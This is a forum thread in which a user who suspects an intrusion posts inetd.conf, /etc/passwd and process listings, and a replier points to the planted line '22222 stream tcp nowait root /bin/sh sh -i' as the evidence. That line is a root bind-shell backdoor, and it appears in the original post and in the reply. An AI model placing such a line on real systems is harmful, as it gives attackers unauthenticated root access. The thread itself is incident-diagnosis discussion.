免费注册 查看新帖 |

Chinaunix

  平台 论坛 博客 文库
论坛 IT运维 数据安全 我怀疑电脑给人动过了,可以看出来吗?
最近访问板块 发新帖
查看: 1967 | 回复: 5
打印 上一主题 下一主题

我怀疑电脑给人动过了,可以看出来吗? [复制链接]

lgs2233

论坛徽章:
0
跳转到指定楼层
1 [收藏(0)] [报告]
发表于 2005-02-24 13:41 |只看该作者 |倒序浏览
inetd.conf 为

22222 stream tcp nowait root /bin/sh sh -i

passwd为
root:0:0:root:/root:/bin/bash
bin:1:1:bin:/bin:
daemon:2:2:daemon:/sbin:
adm:3:4:adm:/var/adm:
lp:4:7:lp:/var/spool/lpd:
sync:5:0:sync:/sbin:/bin/sync
shutdown:6:0:shutdown:/sbin:/sbin/shutdown
halt:7:0:halt:/sbin:/sbin/halt
mail:8:12:mail:/var/spool/mail:
news:9:13:news:/var/spool/news:
uucp:x:10:14:uucp:/var/spool/uucp:
operator:x:11:0perator:/root:
games:x:12:100:games:/usr/games:
gopher:x:13:30:gopher:/usr/lib/gopher-data:
ftp:x:14:50:FTP User:/var/ftp:
nobody:x:99:99:Nobody:/:
named:x:25:25:Named:/var/named:/bin/false
xfs:x:43:43:X Font Server:/etc/X11/fs:/bin/false
gdm:x:42:42::/home/gdm:/bin/bash
rpcuser:x:29:29:RPC Service User:/var/lib/nfs:/bin/false
rpc:x:32:32ortmapper RPC user:/:/bin/false
csyat:x:501:501::/usr/local/httpd/htdocs/sunyat:/bin/bash
vpopmail:x:89:89::/home/vpopmail:/bin/bash
alias:x:506:506::/var/qmail/alias:/bin/bash
qmaild:x:507:506::/var/qmail:/bin/bash
qmaill:x:508:506::/var/qmail:/bin/bash
qmailp:x:509:506::/var/qmail:/bin/bash
qmailq:x:510:507::/var/qmail:/bin/bash
qmailr:x:511:507::/var/qmail:/bin/bash
qmails:x:512:507::/var/qmail:/bin/bash

ps ax 为

  PID TTY      STAT   TIME COMMAND
    1 ?        S      0:05 init [3]
    2 ?        SW     0:00 [kflushd]
    3 ?        SW     0:00 [kupdate]
    4 ?        SW     0:00 [kpiod]
    5 ?        SW     0:00 [kswapd]
    6 ?        SW<    0:00 [mdrecoveryd]
   64 ?        SW     0:00 [khubd]
  179 ?        S      0:00 svscan /service
  185 ?        S      0:00 supervise vmailmgrd
  186 ?        S      0:00 supervise log
  417 ?        S      1:38 syslogd -m 0
  427 ?        S      0:00 klogd
  442 ?        S      0:00 identd -e -o
  449 ?        S      0:00 identd -e -o
  450 ?        S      0:00 identd -e -o
  451 ?        S      0:00 identd -e -o
  452 ?        S      0:00 identd -e -o
  461 ?        S      0:00 xinetd -reuse -pidfile /var/run/xinetd.pid
  476 ?        S      0:00 named -u named
  504 ?        S      0:00 sh /usr/local/mysql/bin/safe_mysqld --datadir=/usr/lo
  535 ?        S      0:00 /usr/local/mysql/libexec/mysqld --basedir=/usr/local/
  537 ?        S      0:00 /usr/local/mysql/libexec/mysqld --basedir=/usr/local/
  538 ?        S      0:00 /usr/local/mysql/libexec/mysqld --basedir=/usr/local/
  539 ?        S      0:00 smbd -D
  549 ?        S      0:00 nmbd -D
  603 ?        S      0:00 /usr/local/httpd/bin/httpd
  605 ?        S      0:00 /usr/local/httpd/bin/httpd
  606 ?        S      0:00 /usr/local/httpd/bin/httpd
  607 ?        S      0:00 /usr/local/httpd/bin/httpd
  608 ?        S      0:00 /usr/local/httpd/bin/httpd
  609 ?        S      0:00 /usr/local/httpd/bin/httpd
  611 ?        S      3:33 qmail-send
  613 ?        S      0:00 /usr/local/bin/tcpserver -H -R -l 0 -t 1 -c 100 -v -p
  615 ?        S      0:00 /usr/local/bin/tcpserver -c 100 -v -U -H -R 0 pop3 /v
  617 tty1     S      0:00 /sbin/mingetty tty1
  618 tty2     S      0:00 /sbin/mingetty tty2
  619 tty3     S      0:00 /sbin/mingetty tty3
  620 tty4     S      0:00 /sbin/mingetty tty4
  621 tty5     S      0:00 /sbin/mingetty tty5
  622 tty6     S      0:00 /sbin/mingetty tty6
  625 ?        S      0:01 splogger qmail
  626 ?        S      0:00 qmail-lspawn ./Maildir
  627 ?        S      0:00 qmail-rspawn
  628 ?        S      0:00 qmail-clean
  629 ?        S      0:00 /usr/local/httpd/bin/httpd
  632 ?        S      0:00 /usr/local/httpd/bin/httpd
  633 ?        S      0:00 /usr/local/httpd/bin/httpd
  634 ?        S      0:00 /usr/local/httpd/bin/httpd
  636 ?        S      0:00 /usr/local/httpd/bin/httpd
  692 ?        S      0:00 /usr/local/httpd/bin/httpd
  747 ?        Z      0:00 [sh <defunct>;]
19055 ?        S      0:00 /usr/local/httpd/bin/httpd
19781 ?        S      0:00 in.telnetd: 192.168.0.2
19784 pts/0    S      0:00 login -- csyat                    
19794 pts/0    S      0:00 -bash
19819 pts/0    S      0:00 su -
19834 pts/0    S      0:00 -bash
20474 ?        S      0:00 /usr/local/httpd/bin/httpd
20477 ?        S      0:00 /usr/local/httpd/bin/httpd
20482 ?        S      0:00 /usr/local/httpd/bin/httpd
20559 ?        S      0:00 xinetd -reuse -pidfile /var/run/xinetd.pid
20625 pts/0    R      0:00 ps ax
hongfengyue

论坛徽章:
0
2 [报告]
发表于 2005-02-24 14:41 |只看该作者

我怀疑电脑给人动过了,可以看出来吗?

看不出来。
实战分享:从技术角度谈机器学习入门| 【大话IT】RadonDB低门槛向MySQL集群下战书 | ChinaUnix打赏功能已上线! | 新一代分布式关系型数据库RadonDB知多少?
ayazero

论坛徽章:
0
3 [报告]
发表于 2005-02-24 14:57 |只看该作者

我怀疑电脑给人动过了,可以看出来吗?

似乎是被人搞过了:)
实战分享:从技术角度谈机器学习入门| 【大话IT】RadonDB低门槛向MySQL集群下战书 | ChinaUnix打赏功能已上线! | 新一代分布式关系型数据库RadonDB知多少?
lgs2233

论坛徽章:
0
4 [报告]
发表于 2005-02-24 15:15 |只看该作者

我怀疑电脑给人动过了,可以看出来吗?

ayazero大侠
哪里出了问题?
实战分享:从技术角度谈机器学习入门| 【大话IT】RadonDB低门槛向MySQL集群下战书 | ChinaUnix打赏功能已上线! | 新一代分布式关系型数据库RadonDB知多少?
ayazero

论坛徽章:
0
5 [报告]
发表于 2005-02-24 15:29 |只看该作者

我怀疑电脑给人动过了,可以看出来吗?

22222 stream tcp nowait root /bin/sh sh -i
实战分享:从技术角度谈机器学习入门| 【大话IT】RadonDB低门槛向MySQL集群下战书 | ChinaUnix打赏功能已上线! | 新一代分布式关系型数据库RadonDB知多少?
返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 注册

本版积分规则 发表回复

  

北京盛拓优讯信息技术有限公司. 版权所有 京ICP备16024965号-6 北京市公安局海淀分局网监中心备案编号:11010802020122 niuxiaotong@pcpop.com 17352615567
未成年举报专区
中国互联网协会会员  联系我们:huangweiwei@itpub.net
感谢所有关心和支持过ChinaUnix的朋友们 转载本站内容请注明原作者名及出处

清除 Cookies - ChinaUnix - Archiver - WAP - TOP